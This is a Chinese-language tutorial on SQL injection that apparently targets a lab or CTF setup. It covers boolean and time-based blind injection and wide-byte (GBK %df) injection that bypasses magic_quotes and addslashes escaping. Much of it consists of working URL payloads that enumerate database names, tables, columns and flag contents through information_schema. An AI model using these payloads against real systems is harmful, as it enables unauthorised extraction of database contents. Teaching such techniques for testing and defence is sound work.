常见web漏洞——SQL注入
盲注
有时目标存在注入,但在页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注。
时间盲注其实和布尔盲注其实没有什么太大的区别,只不过是一个依靠页面是否正常判断,一个是否延时判断,在操作上其实也差不多,只不过时间注入多一个if()
布尔盲注
布尔很明显就是true
和false
,也就是说它只会根据信息返回true
和false
,也就是没有了之前的报错信息。
时间盲注
界面返回值只有一种true
,无论输入任何值,返回情况都会按照正常的来处理。加入特定的时间函数,通过查看web
页面返回的时间差来判断注入的语句是否正确。
盲注函数
length()
函数 返回字符串的长度
?id=1 and length(database())>1
substr()
截取字符串 , 从第一位截取一个
?id=1 and substr(database(),1,1)='k'
ord()/ascii()
返回字符的ascii
码
?id=1 and ord(substr(database(),1,1))=107
limit 0,1
显示第一条substr
(截取的内容,截取的位数,截取的个数)
substr(database(),1,1)
显示第一位字符- 时间型:
sleep(n)
将程序挂起一段时间,n为n秒 if(expr1,expr2,expr3)
判断语句 如果第一个语句正确就执行第二个语句,如果错误执行第三个语句
?id=1' and if(length(database())=8,1,sleep(5))-- +
演示语句
猜数据库的长度;
?id=1 and (length(database()))>11#
猜测数据库的库名:
?id=1 and ascii(substr(database(),1,1))>1#
猜表名(示例为查询第一个表名)
and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 //注意括号问题
and substr((select table_name from information_schema.tables where table_schema='kanwolongxia' limit 0,1),1,1)='l'
猜第一个字段名第一个字符:
and substr((select column_name from information_schema.columns where table_name='loflag' limit 0,1),1,1)='i'
猜第一个字段名第二个字符:
and substr((select column_name from information_schema.columns where table_name='loflag' limit 0,1),2,1)='i'
猜第二个字段名:
and substr((select column_name from information_schema.columns where table_name='loflag' limit 1,1),2,1)='l'#
猜字段中的内容:
and (ascii(substr(( select flaglo from loflag limit 0,1),1,1)))=122
时间盲注猜测数据库的长度:
?id=1" and if(length(database())=12,sleep(5),1) -- +
猜测数据库的库名:
if(ascii(substr(database(),1,1))>120,0,sleep(10)) --+
猜测数据库中表的长度:
?id=1" and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6,sleep(5),1) -- +
猜测数据库中的表名:
?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=120,sleep(5),1) -- +
猜测表中的字段名的长度:
?id=1" and if(length((select column_name from information_schema.columns where table_schema=database() and table_name='loflag' limit 0,1))=2,sleep(5),111) -- +
猜测表中的字段名:
?id=1" and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='loflag' limit 0,1),1,1))=73,sleep(5),111) -- +
猜测字段中内容的长度:
?id=1" and if(length((select flaglo from loflag limit 0,1))=111,sleep(5),111) -- +
猜测字段中的内容:
?id=1" and if((ascii(substr((select flaglo from loflag limit 0,1),1,1)))=120,sleep(5),111) -- +
burp抓包演示
先判断长度,再判断内容
宽字节注入
php魔术函数
magic_quotes_gpc
(魔术引号开关)——> 防御sql注入magic_quotes_gpc
函数在php
中的作用是判断解析用户提交的数据,如包括有:post、get、cookie
过来的数据增加转义字符“\
”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误,防止注入使其无法闭合。- 单引号(
’
)、双引号(”
)、反斜线(\
)等字符都会被加上反斜线
开启方式
php
在版本5.4
开始将魔术引号的设置转化为特定函数addalashes()
使用,$b = addcslashes($_REQUEST[8]);
不在配置文件中打开【原因是将安全编码交给了用户自己,避免用户过度依赖造成安全隐患】,或者在php.ini
中修改。
开启效果
作用
- 当PHP的传参中有特殊字符就会再前面加转义字符’
\
',来做一定的过滤
绕过方法
单引号和双引号内的一切都是字符串,那我们输入的东西如果不能闭合掉单引号和双引号,我们的输入就不会当作代码执行,就无法产生SQL注入,那我们该怎么办?
- 不需要闭合
- 仔细查看作用域(
POST、GET、COOKIE
),$_SERVER
就在作用域之外。 - 宽字节注入
宽字节注入
尽管现在呼吁所有的程序都使用
unicode
编码,所有的网站都使用utf-8
编码,来一个统一的国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms
,仍然使用着自己国家的一套编码,比如我国的gbk
、gb2312
,作为自己默认的编码类型。也有一些cms
为了考虑老用户,推出了gbk
和utf-8
两个版本(例如:dedecms
)
我们就以gbk
字符编码为例,拉开帷幕。GBK
【双字符编码】全称《汉字内码扩展规范》,gbk
是一种多字符编码【多个字符组在一起成为一个字】。他使用了双字节编码方案,因为双字节编码所以gbk
编码汉字,占用2
个字节。一个utf-8
编码的汉字,占用3
个字节。
- 核心:传一个字符将反斜杠吃掉成为汉字
- 数据库使用
GBK
编码可能存在宽字节注入 MySql
的编码设置:SET NAMES 'gbk'
或是SET character_set_client =gbk
- 宽字节SQL注入就是
PHP
发送请求到MySql
时使用了语句
SET NAMES 'gbk'
或是SET character_set_client =gbk
进行了一次编码,但是又由于一些不经意的字符集转换导致了宽字节注入。 %df \
、%9c \
——>汉字- 绕过其中的单引号等字符,除了采用嵌套法
?id=1%df' union select 1,2, column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=database() limit 0,1)-- +
- 也可以采用十六进制标识法
?id=1%df' union select 1,2, column_name from information_schema.columns where table_name=0x6368696e615f666c6167 limit 1,1-- +
- 宽字节注入可以直接传入汉字